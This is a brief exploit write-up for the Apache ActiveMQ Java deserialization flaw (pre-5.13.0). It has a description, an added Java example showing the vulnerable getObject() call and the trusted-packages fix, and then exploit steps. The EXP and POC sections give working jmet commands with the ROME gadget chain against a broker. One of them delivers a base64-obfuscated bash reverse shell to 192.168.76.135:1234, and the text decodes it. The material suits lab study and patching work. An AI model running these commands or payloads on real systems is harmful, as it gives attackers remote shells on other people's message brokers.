1. Description
- Apache ActiveMQ 5.x versions before 5.13.0
- A Java deserialization vulnerability
2. Principle
- Allows a remote attacker to execute arbitrary code via a crafted serialized Java Message Service (JMS) ObjectMessage object
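Added example, not from the original write-up and not code from the jmet or ActiveMQ projects: a minimal Java consumer that shows where the deserialization described above actually takes place. A crafted ObjectMessage is accepted by the broker as opaque bytes; the gadget chain only runs when something feeds those bytes to ObjectInputStream, which is what `ObjectMessage.getObject()` does (the broker's own web console queue browser does the same when it renders the message). The hardened factory uses the package allow-list ActiveMQ introduced in 5.12.2/5.13.0 (`setTrustedPackages`, `setTrustAllPackages`); the broker URL, queue name and `com.example.events` package are assumptions.

```java
import java.io.Serializable;
import java.util.Arrays;
import javax.jms.Connection;
import javax.jms.Destination;
import javax.jms.JMSException;
import javax.jms.Message;
import javax.jms.MessageConsumer;
import javax.jms.ObjectMessage;
import javax.jms.Session;
import org.apache.activemq.ActiveMQConnectionFactory;

public class ObjectMessageConsumer {

    // Assumed values: a hypothetical broker and the queue name used with -Q in the write-up.
    private static final String BROKER_URL = "tcp://broker.example.internal:61616";
    private static final String QUEUE_NAME = "myevent";

    // UNSAFE: before 5.12.2 there is no allow-list at all, so any class on the consumer's
    // classpath can be deserialized by getObject(). On patched versions this call reproduces
    // that exposure by switching the allow-list off. Shown only to contrast with the fix.
    static ActiveMQConnectionFactory unsafeFactory() {
        ActiveMQConnectionFactory f = new ActiveMQConnectionFactory(BROKER_URL);
        f.setTrustAllPackages(true);
        return f;
    }

    // HARDENED (5.12.2+): only classes in the listed packages may be deserialized; a payload
    // built from a library gadget class (e.g. the ROME chain named in the write-up) makes
    // getObject() throw a JMSException instead of instantiating it.
    static ActiveMQConnectionFactory hardenedFactory() {
        ActiveMQConnectionFactory f = new ActiveMQConnectionFactory(BROKER_URL);
        f.setTrustedPackages(Arrays.asList("com.example.events")); // assumed DTO package
        return f;
    }

    static void consumeOne(ActiveMQConnectionFactory factory) throws JMSException {
        Connection conn = factory.createConnection();
        try {
            conn.start();
            Session session = conn.createSession(false, Session.AUTO_ACKNOWLEDGE);
            Destination queue = session.createQueue(QUEUE_NAME);
            MessageConsumer consumer = session.createConsumer(queue);
            Message msg = consumer.receive(2000);
            if (msg instanceof ObjectMessage) {
                try {
                    // This is the call the vulnerability is about: the serialized payload is
                    // read by ObjectInputStream here, not when the broker stored the message.
                    Serializable payload = ((ObjectMessage) msg).getObject();
                    System.out.println("payload class: " + payload.getClass().getName());
                } catch (JMSException e) {
                    // With the allow-list active, an untrusted class is rejected here.
                    System.out.println("rejected ObjectMessage: " + e.getMessage());
                }
            }
        } finally {
            conn.close();
        }
    }

    public static void main(String[] args) throws JMSException {
        consumeOne(hardenedFactory());
    }
}
```

The same allow-list can be set without code changes through the `org.apache.activemq.SERIALIZABLE_PACKAGES` system property on the JVM that consumes the messages; whichever way it is configured, the check must be on the side that calls `getObject()`, because the broker never deserializes the payload when it accepts the message.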
3. EXP
- jmet, a Java deserialization exploitation tool. (Java version: java-11-openjdk-amd64)
- java -jar jmet-0.1.0-all.jar -Q myevent -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 192.168.76.138 61616
- # jmet-0.1.0-all.jar:
- wget https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar
- # An external folder must exist in the same directory: mkdir external
4. POC
1. "touch /tmp/success" ---> "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC43Ni4xMzUvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}"
2. java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC43Ni4xMzUvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.76.138 61616
3. "c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC43Ni4xMzUvMTIzNCAwPiYx" is "sh -i >& /dev/tcp/192.168.76.135/1234 0>&1" after base64 encoding